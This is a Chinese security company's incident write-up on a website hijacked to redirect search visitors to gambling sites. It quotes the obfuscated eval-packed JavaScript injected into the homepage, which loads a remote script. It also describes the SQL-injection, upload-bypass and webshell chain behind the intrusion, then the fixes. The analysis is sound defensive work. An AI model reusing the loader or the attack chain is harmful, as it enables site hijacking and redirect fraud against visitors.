域名預(yù)訂/競(jìng)價(jià)，好“米”不錯(cuò)過(guò)

客戶網(wǎng)站于近日被跳轉(zhuǎn)到賭博網(wǎng)站，打開(kāi)后直接跳轉(zhuǎn)到什么北京賽車，PK10等內(nèi)容的網(wǎng)站上去，客戶網(wǎng)站本身做了百度的推廣，導(dǎo)致所有訪問(wèn)用戶都跳轉(zhuǎn)到賭博網(wǎng)站上去，給客戶帶來(lái)很大的經(jīng)濟(jì)損失，再一個(gè)官方網(wǎng)站的形象也受到了影響。我們SINE安全對(duì)客戶網(wǎng)站進(jìn)行檢查發(fā)現(xiàn)，客戶網(wǎng)站的標(biāo)題TDK被反復(fù)篡改成(北京賽車PK10等內(nèi)容)立刻對(duì)該客戶網(wǎng)站的安全，進(jìn)行全面的源代碼安全審計(jì)以及網(wǎng)站漏洞檢測(cè)與網(wǎng)站漏洞修復(fù)，檢查了客戶的首頁(yè)標(biāo)題TDK內(nèi)容確實(shí)是被篡改，并添加了一些加密的惡意代碼,代碼如下：

type="text/java"eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('m["\\9\\d\\1\\l\\i\\a\\n\\0"]["\\8\\4\\6\\0\\a"](\'\\h\\3\\1\\4\\6\\2\\0 \\0\\k\\2\\a\\e\\7\\0\\a\\q\\0\\5\\g\\b\\f\\b\\3\\1\\4\\6\\2\\0\\7 \\3\\4\\1\\e\\7\\o\\0\\0\\2\\3\\p\\5\\5\\8\\8\\8\\c\\1\\2\\9\\b\\3\\r\\c\\1\\d\\i\\5\\9\\9\\f\\6\\2\\c\\g\\3\\7\\j\\h\\5\\3\\1\\4\\6\\2\\0\\j\');',28,28,'x74|x63|x70|x73|x72|x2f|x69|x22|x77|x64|x65|x61|x2e|x6f|x3d|x76|x6a|x3c|x6d|x3e|x79|x75|window|x6e|x68|x3a|x78|x38'.split('|'),0,{}))

上述網(wǎng)站代碼是ASCII編碼，只要轉(zhuǎn)換成Unicode編碼，就可以看到加密的真實(shí)內(nèi)容。我們工程師對(duì)代碼進(jìn)行解讀，發(fā)現(xiàn)該代碼寫(xiě)的是根據(jù)搜索引擎作為判斷條件進(jìn)行跳轉(zhuǎn)的代碼,通俗來(lái)講就是說(shuō)，該代碼只針對(duì)搜索引擎，網(wǎng)站管理員直接輸入網(wǎng)址并不會(huì)發(fā)現(xiàn)網(wǎng)站跳轉(zhuǎn)到賭博內(nèi)容網(wǎng)站上去，客戶的網(wǎng)站通過(guò)百度或搜狗搜索會(huì)直接跳轉(zhuǎn)到這個(gè)北京賽車、pk10的網(wǎng)站上去。

針對(duì)于上述的問(wèn)題，我們立即刪除加密的跳轉(zhuǎn)代碼，先將客戶網(wǎng)站損失降到最低，促使網(wǎng)站正常訪問(wèn)(因?yàn)榭蛻粢恢痹谧霭俣韧茝V，一直在燒錢(qián)),通過(guò)一系列的安全檢測(cè)，網(wǎng)站到底是因?yàn)槟切┞┒幢簧蟼髂抉R，并篡改網(wǎng)站首頁(yè)的呢?經(jīng)過(guò)我們Sine安全工程師對(duì)網(wǎng)站代碼的詳細(xì)的安全檢測(cè)后，發(fā)現(xiàn)該網(wǎng)站系統(tǒng)存在SQL注入漏洞，導(dǎo)致攻擊者可以獲取到管理員賬戶和密碼,而網(wǎng)站后臺(tái)的地址用的也是默認(rèn)的admin目錄名,致使黑客獲取密碼后，直接登錄網(wǎng)站后臺(tái)，在對(duì)網(wǎng)站后臺(tái)安全檢測(cè)的時(shí)候，發(fā)現(xiàn)產(chǎn)品圖片上傳功能，存在繞過(guò)格式上傳腳本木馬的漏洞。

該網(wǎng)站漏洞產(chǎn)生于網(wǎng)站后臺(tái)的產(chǎn)品上傳頁(yè)面代碼中的$this->getext($filear["name"]); //取得擴(kuò)展名$this->set_savename($file); //設(shè)置保存文件名，這個(gè)代碼對(duì)文件擴(kuò)展名可以直接繞過(guò)并上傳php格式的腳本文件,從而讓攻擊者輕易取得網(wǎng)站的權(quán)限?？蛻暨€反映說(shuō)，網(wǎng)站經(jīng)常被反復(fù)的篡改，導(dǎo)致跳轉(zhuǎn)到賭博網(wǎng)站，找了網(wǎng)站建設(shè)的公司，他們也只是刪除掉代碼,沒(méi)過(guò)多久就又被篡改跳轉(zhuǎn)了,導(dǎo)致客戶網(wǎng)站損失嚴(yán)重，發(fā)生篡改跳轉(zhuǎn)的根本原因就是網(wǎng)站有漏洞，如果沒(méi)有修復(fù)好網(wǎng)站漏洞，即使刪除掉惡意代碼也只是表面上的工作，不起作用的還是會(huì)被反復(fù)篡改,于事無(wú)補(bǔ)，亡羊補(bǔ)牢一樣。需要對(duì)網(wǎng)站進(jìn)行安全檢測(cè)，以及網(wǎng)站漏洞檢測(cè)，并修復(fù)好網(wǎng)站漏洞，清除木馬后門(mén)，網(wǎng)站安全部署好,才會(huì)使網(wǎng)站更加的安全穩(wěn)定運(yùn)行。

網(wǎng)站漏洞修復(fù)的處理過(guò)程如下：

對(duì)客戶網(wǎng)站源代碼進(jìn)行安全加固以及防止sql注入的前端過(guò)濾代碼,網(wǎng)站的后臺(tái)目錄安全設(shè)置，更改admin文件名為@#%admin,對(duì)網(wǎng)站后臺(tái)圖片上傳功能代碼進(jìn)行漏洞修復(fù)，設(shè)置上傳文件白名單機(jī)制，以及文件上傳的目錄進(jìn)行了腳本安全權(quán)限設(shè)置，禁止進(jìn)行腳本,對(duì)上傳的文件擴(kuò)展也進(jìn)行了深入的安全過(guò)濾,網(wǎng)站的數(shù)據(jù)庫(kù)安全部署，對(duì)數(shù)據(jù)庫(kù)的連接信息進(jìn)行加密，刪除root管理權(quán)限，設(shè)置普通數(shù)據(jù)庫(kù)賬號(hào)，讀寫(xiě)分離，新建表，查詢表，寫(xiě)入表等數(shù)據(jù)庫(kù)正常操作權(quán)限,網(wǎng)站后臺(tái)的賬號(hào)密碼設(shè)置的復(fù)雜一些，密碼為12位數(shù)字+字母+大小寫(xiě)組合，從發(fā)現(xiàn)網(wǎng)站漏洞到目前解決問(wèn)題中，共查找到腳本木馬3個(gè)(webshell),一句話小馬后門(mén)2個(gè)，發(fā)現(xiàn)網(wǎng)站的模板內(nèi)容也被篡改了，導(dǎo)致客戶生成首頁(yè)的時(shí)候隨之也被加了惡意加密的代碼。

網(wǎng)站安全預(yù)防措施：

1.盡量避免網(wǎng)站后臺(tái)的默認(rèn)名稱如admin manage houtai

2.對(duì)網(wǎng)站上傳目錄的權(quán)限進(jìn)行控制。(設(shè)置無(wú)腳本執(zhí)行權(quán)限)

3.網(wǎng)站后臺(tái)的用戶名和密碼設(shè)置復(fù)雜點(diǎn)，數(shù)字+字母+大小寫(xiě)+特殊符號(hào)組合。

4.阿里云虛擬主機(jī)用戶的FTP賬號(hào)密碼要設(shè)置復(fù)雜點(diǎn)，數(shù)字+字母+大小寫(xiě)+特殊符號(hào)組合。

5.如果是單獨(dú)服務(wù)器的客戶，建議先把服務(wù)器的安全部署好，對(duì)每個(gè)網(wǎng)站的文件夾進(jìn)行安全部署，數(shù)據(jù)庫(kù)安全部署，,再做網(wǎng)站的安全,否則你網(wǎng)站再安全，服務(wù)器不安全也是于事無(wú)補(bǔ)。如果對(duì)安全不是太懂的話，建議找專業(yè)的網(wǎng)站安全公司去處理解決。

申請(qǐng)創(chuàng)業(yè)報(bào)道，分享創(chuàng)業(yè)好點(diǎn)子。點(diǎn)擊此處，共同探討創(chuàng)業(yè)新機(jī)遇！